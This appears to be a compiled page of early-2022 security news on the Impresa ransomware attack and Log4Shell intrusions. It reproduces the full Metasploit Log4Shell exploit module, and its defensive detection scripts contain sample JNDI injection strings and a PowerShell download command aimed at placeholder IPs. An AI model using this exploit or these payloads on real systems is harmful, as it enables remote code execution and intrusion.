
Portugal Media Giant Impresa Crippled by Ransomware Attack

Description

Media giant Impresa, which owns the largest television station and newspaper in Portugal, was crippled by a ransomware attack just hours into 2022. The suspected ransomware gang behind the attack goes by the name Lapsus$.

The attack took down the websites of the Impresa-owned Expresso newspaper and the SIC television station. Both remained offline Tuesday morning as the media giant continued its recovery from the New Year's weekend attack. The server infrastructure critical to Impresa's operations was affected, and one of Impresa's verified Twitter accounts was also compromised, hijacked and used to taunt the company publicly.

Various news outlets also reported the attack, including SIC Noticias, SIC’s news TV station, which tweeted a confirmation of the incident, and Portugal’s Observador newspaper.

“The Impresa group confirms that its Expresso and SIC sites, as well as some of their social media pages, are temporarily unavailable, apparently the target of a computer attack, and that actions are being taken to resolve the situation,” according to the tweet.

Lapsus$ identified itself as the culprit of the attack by defacing all of Impresa’s sites with a ransom note letting the company know that it had gained access to Impresa’s Amazon Web Services account, according to a screenshot of the note posted online by The Record.

Pressure to Pay

It appears Impresa was able to regain control over the account on Monday when all of the sites were put into maintenance mode, showing notes on respective home pages that they were temporarily unavailable.

However, Lapsus$ kept up the pressure on Impresa via Twitter, tweeting from Expresso’s verified Twitter account on Monday to demonstrate that it still had access to company resources, according to Recorded Future.

Neither the company nor Lapsus$ so far has revealed the amount of the extortion payment associated with the incident, which marks the first time the group has attacked an entity in Portugal, Lino Santos, the coordinator of Portugal’s National Cybersecurity Center, told the Observador.

Lapsus$ Group came on the ransomware scene in 2021 and so far is best known for an attack on the Brazil Ministry of Health last month. The incident took down several online entities, successfully wiping out information on citizens’ COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.

More Ransomware on the Way

The attack shows that the significant ramp-up in ransomware attacks seen in 2021 shows no signs of slowing in the new year.

“Ransomware is not going away,” Dave Pasirstein, chief product officer and head of engineering for TruU wrote in an email to Threatpost. “It’s a lucrative business that is nearly impossible to protect against all risk vectors.”

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools

 

Description

Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.

Researchers from CrowdStrike Falcon OverWatch recently disrupted threat actors using Log4Shell exploit tools against a vulnerable VMware installation during an attack on a large, undisclosed academic institution, according to research released Wednesday.

OverWatch quickly notified the organization of the activity so the target could “begin their incident response protocol,” researchers said.

CrowdStrike, among other security firms, has been monitoring for suspicious activity around a vulnerability tracked as CVE-2021-44228 and colloquially known as Log4Shell that was found in the Apache Log4j logging library in early December and immediately set upon by attackers.

Ever-Widening Attack Surface

Due to its ubiquitous use, many common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and others are vulnerable to Log4Shell attacks. Recently, VMware also issued guidance that some components of its Horizon service are vulnerable to Log4j exploits, leading OverWatch to add the VMware Horizon Tomcat web server service to their processes-to-watch list, researchers said.

The Falcon OverWatch team noticed the Aquatic Panda intrusion when the threat actor performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, they wrote in the post.

“The threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure,” researchers wrote.

The commands were executed on a Windows host under the Apache Tomcat service, researchers said. They triaged the initial activity and immediately sent a critical detection to the victim organization, later sharing additional details directly with their security team, they said.

Eventually, researchers assessed that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations, and that the infrastructure used in the attack is linked to Aquatic Panda, they said.

Tracking the Attack

OverWatch researchers tracked the threat actor's activity closely during the intrusion to provide continuous updates to the academic institution as its security administrators scrambled to mitigate the attack, they said.

Aquatic Panda engaged in reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. Researchers also observed the group attempt to discover and stop a third-party endpoint detection and response (EDR) service, they said.

The threat actors downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. They also retrieved three files with VBS file extensions from remote infrastructure, which they then decoded.

“Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking,” researchers wrote.

Aquatic Panda eventually made multiple attempts to harvest credentials by dumping the memory of the LSASS process using living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe.

“The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\temp\ directories,” researchers wrote.

The victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.
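The intrusion steps above map onto a handful of host-level detections: a DNS lookup for the reported domain, a shell spawned under the Tomcat service, a Base64-encoded PowerShell command that fetches a file, a renamed createdump.exe or rdrleakdiag.exe used against LSASS, a memory dump being compressed with WinRAR, and executables being deleted from ProgramData and Windows\temp. The following is an added example of that detection logic, not CrowdStrike's code; the telemetry records are constructed, and the field names (event, image, parent_image, original_filename, command_line, query) are an assumed schema rather than any product's real one.

```python
"""Detection rules for the intrusion steps described in the report (added example).

The event records are constructed and the field names are an assumed schema,
not that of any specific EDR or Sysmon configuration.
"""
import base64
import ntpath
import re

# The report's connectivity-check domain dns[.]1433[.]eu[.]org, refanged.
C2_DNS_SUFFIX = "1433.eu.org"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "sh.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe"}


def _b64_utf16(cmd):
    """Encode a PowerShell command the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed telemetry, loosely following the sequence in the report.
SAMPLE_EVENTS = [
    {"event": "dns", "image": r"C:\Tomcat\bin\tomcat9.exe",
     "query": "probe1.dns.1433.eu.org"},
    {"event": "process", "parent_image": r"C:\Tomcat\bin\tomcat9.exe",
     "image": r"C:\Windows\System32\cmd.exe", "original_filename": "Cmd.Exe",
     "command_line": "cmd.exe /c whoami /priv"},
    {"event": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_filename": "PowerShell.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc "
     + _b64_utf16(r"Invoke-WebRequest http://203.0.113.5/t.vbs -OutFile C:\ProgramData\t.vbs")},
    {"event": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\cdump.exe", "original_filename": "createdump.exe",
     "command_line": "cdump.exe 784"},
    {"event": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rdrleakdiag.exe", "original_filename": "RdrLeakDiag.exe",
     "command_line": "rdrleakdiag.exe /p 784"},
    {"event": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\WinRAR\Rar.exe", "original_filename": "Rar.exe",
     "command_line": r"Rar.exe a C:\ProgramData\out.rar C:\ProgramData\784.dmp"},
    {"event": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe", "original_filename": "Cmd.Exe",
     "command_line": r"cmd.exe /c del /q C:\ProgramData\*.exe C:\Windows\Temp\*.exe"},
    {"event": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "original_filename": "NOTEPAD.EXE",
     "command_line": "notepad.exe"},
]


def decode_encoded_command(command_line):
    """Return the decoded text of a PowerShell -enc/-EncodedCommand argument, or None."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Return the list of rule names that fire on one event (empty if nothing fires)."""
    findings = []
    if ev["event"] == "dns":
        if ev["query"].lower().endswith(C2_DNS_SUFFIX):
            findings.append("dns-lookup-to-reported-c2-domain")
        return findings
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev.get("parent_image", "")).lower()
    orig = ev.get("original_filename", "").lower()
    cmd = ev.get("command_line", "")
    # An application server should not be spawning shells (the Log4Shell foothold).
    if image in SHELLS and "tomcat" in parent:
        findings.append("shell-spawned-by-tomcat-service")
    # PE original filename disagrees with the on-disk name (createdump.exe copied as cdump.exe).
    if orig and orig != image:
        findings.append("renamed-binary:" + orig)
    # Living-off-the-land binaries the report names for LSASS memory dumping.
    if orig == "createdump.exe" or image == "rdrleakdiag.exe":
        findings.append("memory-dump-tool")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("powershell-encoded-command")
        if re.search(r"(?i)invoke-webrequest|downloadstring|downloadfile|\bcurl\b|\bwget\b", decoded):
            findings.append("powershell-download-cradle")
    # A memory dump being archived before exfiltration.
    if image in ARCHIVERS and ".dmp" in cmd.lower():
        findings.append("memory-dump-archived")
    # Anti-forensics: executables wiped from the staging directories the report names.
    if image == "cmd.exe" and re.search(r"(?i)\bdel\b.*(programdata|windows\\temp).*\.exe", cmd):
        findings.append("executables-deleted-from-staging-dirs")
    return findings


def scan(events):
    """Map event index -> findings for every event on which at least one rule fires."""
    hits = {}
    for i, ev in enumerate(events):
        findings = classify(ev)
        if findings:
            hits[i] = findings
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].get("command_line") or SAMPLE_EVENTS[idx]["query"], names)
```

Each rule is weak on its own (rdrleakdiag.exe and createdump.exe have legitimate uses, and encoded PowerShell is common in administration), so the value is in the sequence: several of these firing on one host within minutes of a shell under the Tomcat service is the pattern the report describes.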

New Year, Same Exploit

As 2021 comes to a close, Log4Shell, and the exploits attackers have developed to use it for nefarious activity, will likely carry their disruption into the new year.

“The discussion globally around Log4j has been intense, putting many organizations on edge,” OverWatch researchers wrote. “No organization wants to hear about such a potentially destructive vulnerability affecting its networks.”

Indeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, spawning 60 variants of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix also turned problematic, creating a vulnerability of its own.

Moreover, Aquatic Panda is not the first organized cybercrime group to recognize the opportunity to exploit Log4Shell, and likely will not be the last. On Dec. 20, the Russia-based Conti ransomware gang, known for its sophistication and ruthlessness, became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability with the creation of a holistic attack chain.

CrowdStrike urged organizations to remain abreast of the latest mitigations available for Log4Shell and overall Log4j vulnerabilities as the situation evolves.

Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution

 

Description


A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Panda has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.

Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed “large academic institution.” The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors.

The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.


“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.

Aquatic Panda’s malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

But after the victim organization was alerted to the incident, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” In light of the attack’s successful disruption, the exact intent remains unknown.

Log4Shell HTTP Header Injection

 

Description

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Log4Shell
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CheckModule
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'Log4Shell HTTP Header Injection',
      'Description' => %q{
        Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
        log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

        This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that
        will trigger an LDAP connection to Metasploit and load a payload.

        The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
        server in addition to the LDAP server that the target can connect to. The targeted application must have the
        trusted code base option enabled for this technique to work.

        The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
        run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
        application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
      },
      'Author' => [
        'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff
        'juan vazquez', # 2011-3544 building blocks reused in this module
        'sinn3r', # 2011-3544 building blocks reused in this module
        'Spencer McIntyre', # Kickoff on 2021-44228 work, improvements, and polish required for formal acceptance
        'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SRVPORT' => 389,
        'WfsDelay' => 30,
        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
      },
      'Targets' => [
        [
          'Automatic', {
            'Platform' => 'java',
            'Arch' => [ARCH_JAVA],
            'RemoteLoad' => true,
            'DefaultOptions' => {
              'PAYLOAD' => 'java/shell_reverse_tcp'
            }
          }
        ],
        [
          'Windows', {
            'Platform' => 'win',
            'RemoteLoad' => false,
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
            }
          },
        ],
        [
          'Linux', {
            'Platform' => 'unix',
            'RemoteLoad' => false,
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION],
        'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]
      }
    )
    register_options([
      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
      OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),
      OptEnum.new('JAVA_GADGET_CHAIN', [
        true, 'The Java gadget chain to use for deserialization', 'CommonsBeanutils1',
        Msf::Exploit::JavaDeserialization.gadget_chains
      ], conditions: %w[TARGET != Automatic]),
      OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic])
    ])
    register_advanced_options([
      OptPort.new('HttpListenerBindPort', [false, 'The port to bind to if different from HTTP_SRVPORT'])
    ])
  end

  def check
    validate_configuration!

    @checkcode = super
  end

  def check_options
    opts = { 'LDAP_TIMEOUT' => datastore['WfsDelay'], 'URIS_FILE' => nil }
    opts['HEADERS_FILE'] = nil unless datastore['HTTP_HEADER'].blank?
    opts
  end

  def resource_url_string
    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
  end

  #
  # Use Ruby Java bridge to create a Java-natively-serialized object
  #
  # @return [String] Marshalled serialized byteArray of the loader class
  def byte_array_payload(pay_class = 'metasploit.PayloadFactory')
    jar = generate_payload.encoded_jar
    serialized_class_from_jar(jar, pay_class)
  end

  #
  # Insert PayloadFactory in Java payload JAR
  #
  # @param jar [Rex::Zip::Jar] payload JAR to update
  # @return [Rex::Zip::Jar] updated payload JAR
  def inject_jar_payload_factory(jar = generate_payload.encoded_jar)
    # From exploits/multi/browser/java_rhino - should probably go to lib
    paths = [
      [ 'metasploit/PayloadFactory.class' ]
    ]
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join('/') + '/'
        jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)
      end
      File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|
        data = fd.read(fd.stat.size)
        jar.add_file(path.join('/'), data)
      end
    end
    jar
  end

  def build_ldap_search_response_payload
    if target['RemoteLoad']
      build_ldap_search_response_payload_remote(resource_url_string)
    else
      build_ldap_search_response_payload_inline(datastore['JAVA_GADGET_CHAIN'])
    end
  end

  ## HTTP service callbacks
  #
  # Handle HTTP requests and responses
  #
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
    pay = regenerate_payload(cli)
    jar = inject_jar_payload_factory(pay.encoded_jar)
    send_response(cli, 200, 'OK', jar)
  end

  #
  # Create an HTTP response and then send it
  #
  def send_response(cli, code, message = 'OK', html = '')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'application/java-archive'
    res.body = html
    cli.send_response(res)
  end

  def exploit
    validate_configuration!
    if datastore['HTTP_HEADER'].blank?
      targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first
      http_header = targetinfo[:headers].keys.first if targetinfo
      fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header

      print_good("Automatically identified vulnerable header: #{http_header}")
    else
      http_header = datastore['HTTP_HEADER']
    end

    # LDAP service
    start_service
    # HTTP service
    if target['RemoteLoad']
      start_http_service('ServerPort' => (datastore['HttpListenerBindPort'].blank? ? datastore['HTTP_SRVPORT'] : datastore['HttpListenerBindPort']).to_i)
    end
    # HTTP request initiator
    send_request_raw(
      'uri' => normalize_uri(target_uri),
      'method' => datastore['HTTP_METHOD'],
      'headers' => { http_header => log4j_jndi_string }
    )
    sleep(datastore['WfsDelay'])
    handler
  ensure
    cleanup
  end

  #
  # Kill HTTP & LDAP services (shut them down and clear resources)
  #
  def cleanup
    # Clean and stop HTTP server
    if @http_service
      begin
        @http_service.remove_resource(datastore['URIPATH'])
        @http_service.deref
        @http_service.stop
        @http_service = nil
      rescue StandardError => e
        print_error("Failed to stop http server due to #{e}")
      end
    end
    super
  end

  def validate_configuration!
    super

    if datastore['HTTP_HEADER'].blank? && !datastore['AutoCheck']
      fail_with(Exploit::Failure::BadConfig, 'Either the AutoCheck option must be enabled or an HTTP_HEADER must be specified.')
    end
  end

  private

  # Boilerplate HTTP service code
  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    path = datastore['URIPATH'] || rand_text_alphanumeric(rand(8..15)) + '.jar'
    path = '/' + path if path !~ %r{^/}
    if path !~ /\.jar$/
      print_status("Appending .jar extension to #{path} as we don't yet serve classpaths")
      path += '.jar'
    end
    datastore['URIPATH'] = path
    return path
  end

  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
  def start_http_service(opts = {})
    # Start a new HTTP server
    @http_service = Rex::ServiceManager.start(
      Rex::Proto::Http::Server,
      (opts['ServerPort'] || bindport).to_i,
      opts['ServerHost'] || bindhost,
      datastore['SSL'],
      {
        'Msf' => framework,
        'MsfExploit' => self
      },
      opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
      datastore['SSLCert'],
      datastore['SSLCompression'],
      datastore['SSLCipher'],
      datastore['SSLVersion']
    )
    @http_service.server_name = datastore['HTTP::server_name']
    # Default the procedure of the URI to on_request_uri if one isn't
    # provided.
    uopts = {
      'Proc' => method(:on_request_uri),
      'Path' => resource_uri
    }.update(opts['Uri'] || {})
    proto = (datastore['SSL'] ? 'https' : 'http')

    netloc = opts['ServerHost'] || bindhost
    http_srvport = (opts['ServerPort'] || bindport).to_i
    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{http_srvport}"
      else
        netloc = "#{netloc}:#{http_srvport}"
      end
    end
    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")

    # Add path to resource
    @service_path = uopts['Path']
    @http_service.add_resource(uopts['Path'], uopts)
  end
end

Apache released a patch to address the critical zero-day vulnerability in log4j

 

Description

THREAT LEVEL: Red.

For a detailed advisory, download the pdf file here.

A zero-day remote code execution vulnerability, CVE-2021-44228, was discovered in Apache log4j, affecting versions 2.0 to 2.14.1. Apache log4j is a Java logging package used by millions of applications. Cloud services such as Steam and Apple iCloud, and products such as Apache Struts, Minecraft, VMware, Twitter, Cisco, Google, Amazon, LinkedIn, NetApp, Elasticsearch and many others, have been found to be vulnerable to this flaw.

The vulnerability, tracked as CVE-2021-44228, could allow a remote unauthenticated attacker to execute code on a vulnerable system. The attack is possible because the Java logging library fails to protect against attacker-controlled LDAP and other JNDI-related endpoints.

To exploit this issue, an attacker needs an endpoint reachable over any protocol (HTTP, TCP, etc.) through which the crafted string can be sent, and a log statement at that endpoint that logs the string taken from the request.

Users can check whether their system is affected by this vulnerability by looking for any of the hashes from the repository in their software inventory. To check for exploitation attempts, run the following command on Linux systems: sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log/
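The egrep command above catches the literal form of the lookup string; the injected header the Metasploit module description earlier on this page talks about can also arrive with the "jndi" keyword split across nested lookups such as ${lower:...}, ${upper:...} or the ${...:-x} default-value syntax, which a plain grep misses. The following added example (not part of the advisory or any of its references) applies the same scheme list as the egrep pattern after unwinding that nesting; the access-log lines are constructed, and the function names are mine.

```python
"""Detector for Log4Shell lookup strings in request logs (added example).

Extends the egrep pattern to nested-lookup forms in which ${lower:...},
${upper:...} and ${...:-x} hide the literal "jndi" keyword. Log lines are
constructed; the scheme list is the egrep command's, not a complete catalogue.
"""
import re

JNDI = re.compile(r"\$\{jndi:(ldap[s]?|rmi|dns):/", re.IGNORECASE)
# Innermost lookups only (no further "${" inside them), so repeated
# substitution unwinds nesting from the inside out.
_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text, max_rounds=16):
    """Resolve nested lookups until the text stops changing.

    The round limit keeps a pathological input from looping indefinitely.
    """
    for _ in range(max_rounds):
        new = _CASE.sub(lambda m: m.group(1), text)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(text):
    """Return the JNDI scheme (ldap, ldaps, rmi or dns) if a lookup is present, else None."""
    m = JNDI.search(normalize(text))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Return (line_index, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed access-log lines: benign, literal, nested-lower, default-value
# trick, and a harmless non-JNDI lookup that must not be flagged.
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}ndi:rmi://203.0.113.9:1099/a}"',
    '203.0.113.7 - - [10/Dec/2021:10:01:06 +0000] "GET /?y=${date:yyyy} HTTP/1.1" 200 612 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for idx, scheme in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: jndi lookup via {scheme}: {normalize(SAMPLE_LINES[idx])}")
```

Run it over files under /var/log/ (or a web server's access logs) by reading them line by line into scan_lines; normalizing before matching is what lets the nested forms on lines 2 and 3 fall out as the same ${jndi:...} string the grep expects.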

We recommend that users take the following actions:

  • For identifying the servers vulnerable to Log4j use the detection tool given by TrendMicro.
  • For a list of hashes to help determine if a Java application is running a vulnerable version of Log4j check the NCC Group’s GitHub page.
  • For Java 8+: upgrade to 2.17.1 and for Java 7: upgrade to 2.12.4 from the patch link and migration guide available in the references.
  • Users can remove the LDAP class from log4j by using the command: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • Set "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false", if acceptable on your JVM versions, to mitigate the vulnerability.
  • In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
  • Deploy the log4j specific rules in your WAF.
  • Block specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic.
  • Implement log4jail, "A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J attacks".
  • Check for the affected software and their fixes available from the link.
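Several of the actions above come down to one inventory question per JAR: which log4j-core version is inside it, and is JndiLookup.class still present? The following is an added example scanner, not a tool from the advisory or its references. It reads the Maven pom.properties that log4j-core ships with to get the version, checks for the class the zip command above removes, descends into nested archives (Spring Boot fat JARs, WARs), and applies the advisory's upgrade targets (2.17.1 for Java 8+, 2.12.4 for Java 7, 2.3.2 for Java 6) as the fixed-version rule. The JARs and versions it builds for the demo are constructed, and the function names are mine.

```python
"""Scan JAR files for the vulnerable Log4j 2 core (added example, not an advisory tool)."""
import io
import re
import zipfile

LOG4J_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release suffix such as '2.0-beta9' is dropped."""
    nums = [int(x) for x in re.findall(r"\d+", text.split("-")[0])]
    if not nums:
        return None
    return tuple(nums + [0] * (3 - len(nums)))[:3]


def classify(version, has_jndi_lookup):
    """Apply the advisory's upgrade targets to one log4j-core version."""
    if not has_jndi_lookup:
        # Class removal mitigates the lookup-based RCE; it does not address
        # the configuration-based CVE-2021-44832, so still plan the upgrade.
        return "jndilookup-removed"
    v = parse_version(version)
    if v is None:
        return "unknown-version"
    if v[:2] == (2, 3):
        fixed = v >= (2, 3, 2)        # Java 6 line
    elif v[:2] == (2, 12):
        fixed = v >= (2, 12, 4)       # Java 7 line
    else:
        fixed = v >= (2, 17, 1)       # Java 8+ line
    return "fixed" if fixed else "upgrade-required"


def scan_jar_bytes(data, name="<bytes>", depth=0):
    """Return [(archive path, version, status)] for every log4j-core found, at any nesting level."""
    results = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return results
    with zf:
        names = set(zf.namelist())
        if LOG4J_POM in names:
            props = zf.read(LOG4J_POM).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = m.group(1).strip() if m else "unknown"
            results.append((name, version, classify(version, JNDI_CLASS in names)))
        if depth < 4:  # bound recursion into archives-within-archives
            for entry in sorted(names):
                if entry.lower().endswith(NESTED_EXT):
                    results.extend(scan_jar_bytes(zf.read(entry), f"{name}!{entry}", depth + 1))
    return results


def scan_file(path):
    """Scan one archive on disk."""
    with open(path, "rb") as fh:
        return scan_jar_bytes(fh.read(), path)


def build_jar(version, include_jndi=True, nested=()):
    """Constructed stand-in for a log4j-core JAR (or a fat JAR wrapping one); demo only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(LOG4J_POM, f"artifactId=log4j-core\nversion={version}\n")
            if include_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
        for entry, data in nested:
            zf.writestr(entry, data)
    return buf.getvalue()


if __name__ == "__main__":
    app = build_jar(None, nested=[("BOOT-INF/lib/log4j-core-2.14.1.jar", build_jar("2.14.1"))])
    for row in scan_jar_bytes(app, "app.jar"):
        print(row)
```

Point scan_file at every archive in the software inventory (including the ones inside application containers, which is why the nested-archive walk matters); a JAR with log4j-core 1.x uses a different Maven path and is out of scope for this check, as are the shaded builds that rename the package, for which the hash lists the advisory links are the better signal.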

The incomplete patch of CVE-2021-44228 resulted in a new issue, tracked as CVE-2021-45056, which affects versions 2.0 to 2.12.1 and 2.13.0 to 2.15.0 and has been resolved in 2.16.0. An attacker with control over Thread Context Map input data can craft malicious input using a JNDI lookup pattern, which can result in a denial-of-service attack.

